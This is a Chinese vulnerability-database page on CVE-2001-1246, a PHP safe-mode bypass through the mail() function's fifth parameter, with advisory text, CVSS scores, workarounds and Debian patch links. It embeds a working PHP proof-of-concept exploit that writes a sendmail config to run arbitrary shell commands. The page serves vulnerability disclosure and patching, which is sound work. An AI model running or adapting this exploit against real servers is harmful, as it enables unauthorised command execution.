CVE-2001-1246
CVSS7.5
发布时间 :2001-06-30 00:00:00
修订时间 :2008-09-10 15:10:02
NMCOE    

[原文]PHP 4.0.5 through 4.1.0 in safe mode does not properly cleanse the 5th parameter to the mail() function, which allows local users and possibly remote attackers to execute arbitrary commands via shell metacharacters.


[CNNVD]PHP mail函数绕过safe_mode限制执行命令漏洞(CNNVD-200106-211)

        
        PHP是一种流行的WEB服务器端编程语言,它功能强大,简单易用,在很多Unix操作系统默认都安装了PHP, 它也可以在Windows系统下运行。
        PHP函数mail的第五个参数存在漏洞,远程攻击者可能利用此漏洞结构CGI脚本中的漏洞绕过PHP的safe_mode的限制执行系统命令。
        从PHP-4.0.5开始,mail函数引入了第五个参数。去年被发现该参数没有很好过滤shell字符使得可以绕过safe_mode的限制执行系统命令。( http://www.nsfocus.com/index.php?act=sec_bug&do=view&bug_id=1593 )该漏洞在PHP-4.0.6被修复。
        然而,PHP的mail函数仍然存在漏洞。mail函数的第五个参数可以在发送mail的时候给MTA(php.ini的sendmail_path设定,默认都是sendmail)传递额外的选项参数,sendmail的-Cfile选项能够改变配置文件,利用sendmail的特性,我们可以在配置文件里指定执行命令,从而使得PHP的mail函数绕过safe_mode的限制来执行任意系统命令。
        

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1246
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2001-1246
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200106-211
(官方数据源) CNNVD

- 其它链接及资源

http://www.iss.net/security_center/static/6787.php
(VENDOR_ADVISORY)  XF  php-safemode-elevate-privileges(6787)
http://www.php.net/do_download.php?download_file=php-4.1.2.tar.gz
(UNKNOWN)  CONFIRM  http://www.php.net/do_download.php?download_file=php-4.1.2.tar.gz
http://www.securityfocus.com/bid/2954
(UNKNOWN)  BID  2954
http://www.redhat.com/support/errata/RHSA-2003-159.html
(UNKNOWN)  REDHAT  RHSA-2003:159
http://www.redhat.com/support/errata/RHSA-2002-129.html
(UNKNOWN)  REDHAT  RHSA-2002:129
http://www.redhat.com/support/errata/RHSA-2002-102.html
(UNKNOWN)  REDHAT  RHSA-2002:102
http://online.securityfocus.com/archive/1/194425
(UNKNOWN)  BUGTRAQ  20010630 php breaks safe mode

- 漏洞信息

PHP mail函数绕过safe_mode限制执行命令漏洞
高危 设计错误
2001-06-30 00:00:00 2005-05-02 00:00:00
本地  
        
        PHP是一种流行的WEB服务器端编程语言,它功能强大,简单易用,在很多Unix操作系统默认都安装了PHP, 它也可以在Windows系统下运行。
        PHP函数mail的第五个参数存在漏洞,远程攻击者可能利用此漏洞结构CGI脚本中的漏洞绕过PHP的safe_mode的限制执行系统命令。
        从PHP-4.0.5开始,mail函数引入了第五个参数。去年被发现该参数没有很好过滤shell字符使得可以绕过safe_mode的限制执行系统命令。( http://www.nsfocus.com/index.php?act=sec_bug&do=view&bug_id=1593 )该漏洞在PHP-4.0.6被修复。
        然而,PHP的mail函数仍然存在漏洞。mail函数的第五个参数可以在发送mail的时候给MTA(php.ini的sendmail_path设定,默认都是sendmail)传递额外的选项参数,sendmail的-Cfile选项能够改变配置文件,利用sendmail的特性,我们可以在配置文件里指定执行命令,从而使得PHP的mail函数绕过safe_mode的限制来执行任意系统命令。
        

- 公告与补丁

        临时解决方法:
        如果您不能立刻安装补丁或者升级,CNNVD建议您采取以下措施以降低威胁:
        * 如果您的主机有其它Web用户可以建立PHP脚本,请在php.ini里暂时关闭mail函数:
        disable_functions = mail
        然后重启WEB Server。
        * 使用PHP的最新CVS代码重新编译PHP。
        厂商补丁:
        Debian
        ------
        Debian已经为此发布了一个安全公告(DSA-168-1)以及相应补丁:
        DSA-168-1:New PHP packages fix several vulnerabilities
        链接:
        http://www.debian.org/security/2002/dsa-168

        补丁下载:
        Source archives:
        
        http://security.debian.org/pool/updates/main/p/php3/php3_3.0.18-0potato1.2.dsc

        Size/MD5 checksum: 1079 82d2b9adff31130eafe78fe9c647d098
        
        http://security.debian.org/pool/updates/main/p/php3/php3_3.0.18-0potato1.2.diff.gz

        Size/MD5 checksum: 39264 e44f4917ce887f53ac7019ab4e3692ba
        
        http://security.debian.org/pool/updates/main/p/php3/php3_3.0.18.orig.tar.gz

        Size/MD5 checksum: 2203818 da541ac71d951c47a011ceb26664ba2d
        
        http://security.debian.org/pool/updates/main/p/php4/php4_4.0.3pl1-0potato4.dsc

        Size/MD5 checksum: 1125 e9b5dbf3554c63dd654e69c83da63a97
        
        http://security.debian.org/pool/updates/main/p/php4/php4_4.0.3pl1-0potato4.diff.gz

        Size/MD5 checksum: 134587 9a862082a0b60f6e2f0fa9c993d3ff19
        
        http://security.debian.org/pool/updates/main/p/php4/php4_4.0.3pl1.orig.tar.gz

        Size/MD5 checksum: 2214630 e65b706a7fc4469d1ccd564ef8a2c534
        Alpha architecture:
        
        http://security.debian.org/pool/updates/main/p/php3/php3_3.0.18-0potato1.2_alpha.deb

        Size/MD5 checksum: 438822 748bb657dff328c22920c186e2ab83a1
        
        http://security.debian.org/pool/updates/main/p/php3/php3-cgi_3.0.18-0potato1.2_alpha.deb

        Size/MD5 checksum: 619332 e9dca7c64949f2d635ff5ed7da682c5d
        
        http://security.debian.org/pool/updates/main/p/php4/php4_4.0.3pl1-0potato4_alpha.deb

        Size/MD5 checksum: 520090 76a0ac1f943c108f28a4238723415367
        
        http://security.debian.org/pool/updates/main/p/php4/php4-cgi_4.0.3pl1-0potato4_alpha.deb

        Size/MD5 checksum: 868874 b8041d6976c11fbb63d0481869351658
        ARM architecture:
        
        http://security.debian.org/pool/updates/main/p/php3/php3_3.0.18-0potato1.2_arm.deb

        Size/MD5 checksum: 379276 3900254a218ea8b08f12adcee5826978
        
        http://security.debian.org/pool/updates/main/p/php3/php3-cgi_3.0.18-0potato1.2_arm.deb

        Size/MD5 checksum: 490638 de60ee781cd3e2dc820fef82a1fe08a8
        Intel IA-32 architecture:
        
        http://security.debian.org/pool/updates/main/p/php3/php3_3.0.18-0potato1.2_i386.deb

        Size/MD5 checksum: 359858 6ee0615cac086a0da432ed40e0edab68
        
        http://security.debian.org/pool/updates/main/p/php3/php3-cgi_3.0.18-0potato1.2_i386.deb

        Size/MD5 checksum: 458174 be4d1d9c54ba0207f39dedfaaaa7d748
        
        http://security.debian.org/pool/updates/main/p/php4/php4_4.0.3pl1-0potato4_i386.deb

        Size/MD5 checksum: 412254 37751e39ac9688d17965cf947ed7f6fc
        
        http://security.debian.org/pool/updates/main/p/php4/php4-cgi_4.0.3pl1-0potato4_i386.deb

        Size/MD5 checksum: 635076 b1dfc5587ea2719ff5a789fc02bc27ec
        Motorola 680x0 architecture:
        
        http://security.debian.org/pool/updates/main/p/php3/php3_3.0.18-0potato1.2_m68k.deb

        Size/MD5 checksum: 355170 9b7fef1df1cc28988eb3f7fdde94dd61
        
        http://security.debian.org/pool/updates/main/p/php3/php3-cgi_3.0.18-0potato1.2_m68k.deb

        Size/MD5 checksum: 429244 1aec470dce3cc9babe341661c7023281
        
        http://security.debian.org/pool/updates/main/p/php4/php4_4.0.3pl1-0potato4_m68k.deb

        Size/MD5 checksum: 408462 29b1bc7739a65d4ebd95d848bccbaf5c
        
        http://security.debian.org/pool/updates/main/p/php4/php4-cgi_4.0.3pl1-0potato4_m68k.deb

        Size/MD5 checksum: 592990 2d3fbdc339ba1692d1c7e98fc50b9920
        PowerPC architecture:
        
        http://security.debian.org/pool/updates/main/p/php3/php3_3.0.18-0potato1.2_powerpc.deb

        Size/MD5 checksum: 380012 c2990c5ec38b1fc4d218a51c750f9963
        
        http://security.debian.org/pool/updates/main/p/php3/php3-cgi_3.0.18-0potato1.2_powerpc.deb

        Size/MD5 checksum: 492568 eebeab3f920fad4812f418045750a489
        
        http://security.debian.org/pool/updates/main/p/php4/php4_4.0.3pl1-0potato4_powerpc.deb

        Size/MD5 checksum: 451892 54e8183df00abee5c8498b4caed0a679
        
        http://security.debian.org/pool/updates/main/p/php4/php4-cgi_4.0.3pl1-0potato4_powerpc.deb

        Size/MD5 checksum: 689728 bd2aeebd0605f35395106a4ce0c76cef
        Sun Sparc architecture:
        
        http://security.debian.org/pool/updates/main/p/php3/php3_3.0.18-0potato1.2_sparc.deb

        Size/MD5 checksum: 371252 f3a0fb13377a8b5b67a851d2c204b87d
        
        http://security.debian.org/pool/updates/main/p/php3/php3-cgi_3.0.18-0potato1.2_sparc.deb

        Size/MD5 checksum: 483476 e749a895f8e9d429d7e3d6eb0f35a945
        
        http://security.debian.org/pool/updates/main/p/php4/php4_4.0.3pl1-0potato4_sparc.deb

        Size/MD5 checksum: 435060 be65d0d8c66e0bdcf5aa3a337a019ea6
        
        http://security.debian.org/pool/updates/main/p/php4/php4-c

- 漏洞信息 (20985)

PHP 4.x SafeMode Arbitrary File Execution Vulnerability (EDBID:20985)
php local
2001-06-30 Verified
0 Wojciech Purczynski
N/A [点击下载]
source: http://www.securityfocus.com/bid/2954/info

PHP is the Personal HomePage development toolkit, distributed by the PHP.net, and maintained by the PHP Development Team in public domain.

A problem with the toolkit could allow elevated privileges, and potentially unauthorized access to restricted resources. A local user may upload a malicious php script, and execute it with a custom query string.

This makes it possible for a local user to execute commands as the HTTP process UID, and potentially gain access with the same privileges of the HTTP UID.

It has been reported that the proposed fix does not entirely fix the problem, as it's possible to pass command line parameters to sendmail when safe_mode is enabled. This may be done through the 5th argument permitted by safe_mode. 

<?
$script=tempnam("/tmp", "script");
$cf=tempnam("/tmp", "cf");

$fd = fopen($cf, "w");
fwrite($fd, "OQ/tmp
Sparse=0
R$*" . chr(9) . "$#local $@ $1 $: $1
Mlocal, P=/bin/sh, A=sh $script");
fclose($fd);

$fd = fopen($script, "w");
fwrite($fd, "rm -f $script $cf; ");
fwrite($fd, $cmd);
fclose($fd);

mail("nobody", "", "", "", "-C$cf");
?>
		

- 漏洞信息

579
PHP Safe Mode mail() Function 5th Parameter Arbitrary Command Execution
Local Access Required Input Manipulation
Loss of Integrity Upgrade
Vendor Verified

- 漏洞描述

- 时间线

2001-06-30 Unknow
Unknow Unknow

- 解决方案

Upgrade to version 4.1.0 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站